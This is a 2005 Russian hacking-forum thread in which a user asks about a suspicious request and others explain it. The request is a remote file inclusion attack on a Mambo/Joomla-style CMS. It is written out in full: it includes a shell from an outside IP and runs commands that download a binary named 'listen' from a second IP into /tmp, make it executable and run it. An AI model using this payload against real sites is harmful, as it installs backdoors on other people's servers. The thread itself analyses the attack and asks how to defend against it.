Форум АНТИЧАТ - пожалуста обьясните

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - пожалуста обьясните (https://forum.antichat.xyz/showthread.php?t=12052)

forever777

23.12.2005 04:40

пожалуста обьясните

setcms.org/index.php?option=com_c...&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|

что это значит они взломать хотят узнав куки?

Rebz	23.12.2005 05:03

куки тут непричём.
поясняю пошагово:
...mosConfig_absolute_path=http://81.174.26.111/cmd.gif - это php-инклуюдинг.

далее идут команды:
cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
заходят во временную папку /tmp/ через сайт.. скачивают файл listen, ставят чмод на этот файл 744, запускают listen.. дальше хз чё.. вывод YYY)
зы: listen - может оказаться бекдором, руткитом, эксплоитом... и т.д.

Dronga

23.12.2005 08:03

http://81.174.26.111/

Можешь посмотреть. Шелл они уже кстати удалили.

forever777

23.12.2005 15:04

походу человек даже с античата

forever777

24.12.2005 06:32

Зависит ли результат выполнения такого запроса от содержимого файла index.php ??? И если да то сто вы могужете порекомендовать, для предотвращения подобных запросов .

Время: 04:02